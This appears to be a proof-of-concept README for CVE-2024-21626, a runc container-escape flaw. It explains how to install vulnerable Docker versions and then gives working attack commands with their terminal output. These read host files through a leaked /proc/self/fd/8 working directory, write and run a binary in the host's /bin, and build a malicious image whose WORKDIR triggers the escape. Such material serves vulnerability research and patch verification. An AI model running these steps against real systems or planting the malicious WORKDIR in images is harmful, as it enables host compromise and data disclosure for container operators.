Share
## https://sploitus.com/exploit?id=17F0090F-89AC-5757-A39B-45005DECDB39
# PoC of CVE-2024-21626
Read my full article for detailed explanation [here](https://sk3pper.github.io/posts/cve-2024-21626/playing-with-cve-2024-21626/).

## Setup environment ๐Ÿ”จ
#### A. Download and install 22.04.1-Ubuntu LTS version 
During the installation do not check the box to download update system.

#### B. Install guest additions CD image to easily work with the virtual machine
- insert Guest additions CD image
- open terminal in the mounted CD image
- run the VBoxLinuxAdditions.run script
    
    ```shell
    demo@demo-pc:/media/demo/VBox_GAs_7.0.14$ sudo ./VBoxLinuxAdditions.run 
    ```

#### C. Install the vulnerable docker version and related components
- Set up Docker's apt repository
 
    ```shell
    # set up Docker's apt repository: add Docker's official GPG key:
    sudo apt update
    sudo apt install ca-certificates curl
    sudo install -m 0755 -d /etc/apt/keyrings
    sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg -o /etc/apt/keyrings/docker.asc
    sudo chmod a+r /etc/apt/keyrings/docker.asc

    # add the repository to Apt sources:
    echo \
    "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu \
    $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
    sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
    sudo apt update
    ```

- Find and install the right version of the different components (docker-ce, docker-ce-cli, containerd.io, docker-buildx-plugin).

    ```shell
    # search in the cache reposiroty the docker-ce available packages
    apt-cache madison docker-ce | awk '{ print $3 }'
    # setup the chosen version
    VERSION_STRING=5:24.0.6-1~ubuntu.22.04~jammy

    # search in the cache reposiroty the containerd.io and docker-buildx-plugin available packages
    apt-cache madison containerd.io | awk '{ print $3 }'
    apt-cache madison docker-buildx-plugin | awk '{ print $3 }'docker-buildx-plugin

    # install the packages
    sudo apt install docker-ce=$VERSION_STRING \
        docker-ce-cli=$VERSION_STRING \
        containerd.io=1.6.4-1 \
        docker-buildx-plugin=0.10.2-1~ubuntu.22.04~jammy
    ```

If the packages are too old to find (see also the old repository online), or if you can't use Docker's apt repository to install Docker Engine, you can download the deb file for your release and install it manually.
Go to https://download.docker.com/linux/ubuntu/dists/ or use the deb files inside the my GitHub repository and install them.

```shell
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git

# install deb files
cd CVE-2024-21626/deb
sudo dpkg -i ./containerd.io_1.6.4-1_amd64.deb \
./docker-ce_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-ce-cli_24.0.6-1~ubuntu.22.04~jammy_amd64.deb \
./docker-buildx-plugin_0.10.2-1~ubuntu.22.04~jammy_amd64.deb
```

#### D. Check the installed versions

```shell
sudo docker version
runc --version    
containerd --version
uname -r
```

#### E. Check if the kernel is vulnerable
To work properly the vulnerability needs the presence of openat2 syscall. Manually checking with the following command:

```shell
grep openat2 /proc/kallsyms 
```
There could be cases where it is necessary to check with the following golang script available in my GitHub repository if the openat2 syscall is present.

```shell
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git

# run testOpenat2
cd testOpenat2
./testOpenat2
The unix.Openat2 syscall is present on this system.
```

The binary found was build with the following flags


```shell
env GOOS=linux GOARCH=amd64 go build testOpenat2.go
```

## Verify if the target is vulnerable ๐Ÿง
Run checkVulnerability.sh and see if the file is printed in the the terminal

```shell
# clone CVE-2024-21626 repository
git clone git@github.com:Sk3pper/CVE-2024-21626.git

# run checkVulnerability.sh
chmod +x checkVulnerability.sh
./checkVulnerability.sh
```

## Attack 1 ๐Ÿฆ
Exploit via Setting Working Directory to `/proc/self/fd/` 

```shell
# run container with working directory to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm

# read host filesystem files inside the container
root@c4c0a9c99be6:.# cat ../../../../../../../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc
```
![exploit via running a container](./images/attack1.png)

## Attack 2 ๐Ÿฏ
Exploit via docker exec:

Open one terminal and execute the following commands
```shell
# terminal 1
# run container
demo@demo-pc:~$ sudo docker run --name cve-2024-21626 --rm -it debian:bookworm
# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar
```

Open another terminal and run the following command
```shell
# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 120
```
Come back to the first terminal and access to the host path filesystem

```shell
# terminal 1: find actula pid with the right cmdline
root@d98de5a852d7:/# ls -f /proc
.    irq   kmsg   kcore   mdstat   cpuinfo  sysvipc   softirqs  bootconfig  execdomains    sysrq-trigger      15
..   net   misc   locks   mounts   devices  version   zoneinfo  interrupts  filesystems    version_signature
fb   sys   mtrr   swaps   uptime   ioports  consoles  buddyinfo  kpagecount  kpagecgroup    self
fs   tty   scsi   asound  vmstat   loadavg  kallsyms  diskstats  kpageflags  vmallocinfo    thread-self
bus  acpi  stat   crypto  cgroups  meminfo  pressure  key-users  partitions  pagetypeinfo   1
dma  keys  iomem  driver  cmdline  modules  slabinfo  schedstat  timer_list  dynamic_debug  9
    
root@d98de5a852d7:/# cat /proc/9/cmdline 
sleep120

# read host filesystem files
root@d98de5a852d7:/# cat /proc/9/cwd/../../../../../../../../../etc/hostname
demo-pc

# read container filesystem files
root@d98de5a852d7:/# cat /etc/hostname 
d98de5a852d7
```


![Exploit via execing into a running container](./images/attack2.png)


## Attack 3a ๐Ÿฆ
```shell
# Attack 3a is attack 1 but adapted to overwrite a host binary

# run container with the working direcotry to /proc/self/fd/8
sudo docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
root@e5b0730af51d:.# 

# write file in the host container
root@b6873018a7e8:.# cat > ../../../../../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF

# change chmod
root@b6873018a7e8:.# ../../../../../bin/chmod +x ../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

# check if the file is present in the host
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x  1 root root          40 mar  7 13:24 cve2024_21626

# try it in the host
demo@demo-pc:/bin$ sudo ./cve2024_21626 
Hello CVE-2024-21626
```
![Exploit via execing into a running container](./images/attack3a.png)


## Attack 3b ๐Ÿฆ
```shell
# scenario 3b: host binary overwrite attack
# Attack 3b is attack 2 but adapted to overwrite a host binary

# terminal 1
# run container
sudo docker run --name cve-2024-21626 --rm -it debian:bookworm

# create symlinks
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /foo
root@d98de5a852d7:/# ln -sf /proc/self/fd/8/ /bar

# terminal 2: exec inside the container and set working directory
sudo docker exec -it -w /bar cve-2024-21626 sleep 1000

# terminal 1
# find actula pid with the right cmdline
root@d98de5a852d7:/# ls -f /proc
.    irq   kmsg   kcore   mdstat   cpuinfo  sysvipc   softirqs  bootconfig  execdomains    sysrq-trigger      15
..   net   misc   locks   mounts   devices  version   zoneinfo  interrupts  filesystems    version_signature
fb   sys   mtrr   swaps   uptime   ioports  consoles  buddyinfo  kpagecount  kpagecgroup    self
fs   tty   scsi   asound  vmstat   loadavg  kallsyms  diskstats  kpageflags  vmallocinfo    thread-self
bus  acpi  stat   crypto  cgroups  meminfo  pressure  key-users  partitions  pagetypeinfo   1
dma  keys  iomem  driver  cmdline  modules  slabinfo  schedstat  timer_list  dynamic_debug  9

root@d98de5a852d7:/# cat /proc/9/cmdline 
sleep120

# write file in the host container
root@b6873018a7e8:.# cat > /proc/8/cwd/../../../../bin/cve2024_21626 << EOF
#!/bin/bash
echo "Hello CVE-2024-21626"
EOF

# change chmod
root@b6873018a7e8:.# /proc/8/cwd/../../../../bin/chmod +x \
                     /proc/8/cwd/../../../../bin/cve2024_21626
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

# check if the file is present in the host
demo@demo-pc:/bin$ ls -la | grep cve
-rwxr-xr-x  1 root root          40 mar  7 13:39 cve2024_21626

# try it in the host
demo@demo-pc:/bin$ sudo ./cve2024_21626 
Hello CVE-2024-21626
```

## Attack with malicious image :whale:
Given the followinf Dockerfile
```Dockerfile
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
WORKDIR /proc/self/fd/8
```
Build and run the image

```shell
sudo docker  build . -t devil-image

sudo docker run -it --rm devil-image bash
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory

root@415a2e1f079f:.# cat ../../../../../etc/hostname
job-working-directory: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory
demo-pc
```
![Exploit via malicious image](./images/attack4.png)